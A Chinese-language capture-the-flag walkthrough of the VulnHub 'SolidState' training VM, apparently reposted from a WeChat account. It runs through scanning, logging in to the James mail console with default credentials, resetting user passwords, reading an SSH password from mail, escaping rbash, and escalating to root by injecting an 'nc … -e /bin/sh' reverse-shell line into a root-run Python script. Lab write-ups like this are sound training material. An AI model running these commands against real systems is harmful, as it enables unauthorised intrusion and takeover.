虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/solidstate-1,261/
虚拟机简介:获取远程系统root权限
目标:1个用户flag和1个root权限flag
级别:中级
1、主机探测
netdiscover -r 192.168.207.0/24
2、服务探测
nmap -A -sS -sV -v -p- 192.168.207.138
查看开放端口为22、25、80、110、119、445
3、渗透测试
3.1 http扫描测试
1.通过nikto进行扫描测试
nikto -host http://192.168.207.138
未发现有用信息
2.使用gobuster爆破
gobuster dir -u http://192.168.207.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s "404,301,302,307,403,500"
未发现有用信息
3.2 James控制台测试
1.查看端口4555位James控制台
使用默认账号密码为:root/root登录成功,查看当前用户
2.查看当前用户信息
listusers
发现存在5个用户
3.重置用户密码
在帮助文档中有重置用户密码方法
setpassword james 123456
setpassword thomas 123456
setpassword john 123456
setpassword mindy 123456
setpassword mailadmin 123456
4.登录邮箱进行测试
telnet 192.168.207.138 110
USER mindy
PASS 123456
LIST
TOP 2 836
在mindy账号中发现SSH登录账号和密码,用户名为:mindy,密码为:P@55W0rd1!2@
3.3 登录SSH控制台
1.通过ssh进行登录
ssh [email protected]
发现无法执行命令
2.查看授权shell
查看指定的shell为rbash
3.通过ssh登录指定shell
ssh [email protected] "export TERM=xterm; python -c 'import pty; pty.spawn("/bin/sh")'"
4.查看用户flag
cat user.txt
3.4 提权操作
1.查看本地存在bash权限用户
cat /etc/passwd | grep bash
2.查看用户启动进程
ps -aux | grep james
查看james用户启动的权限为root
3.查看/opt目录文件信息
cat /opt/tmp.py
ls -lah /opt/tmp.py
4.测试在/tmp中写入文件
5.导入文件
echo "import os nos.system('nc 192.168.207.129 4444 -e /bin/sh')" > /opt/tmp.py
5.等待2-3分钟获取反弹shell
6.获取flag信息
python -c 'import pty; pty.spawn("/bin/sh")'
cat root.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之SolidState
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论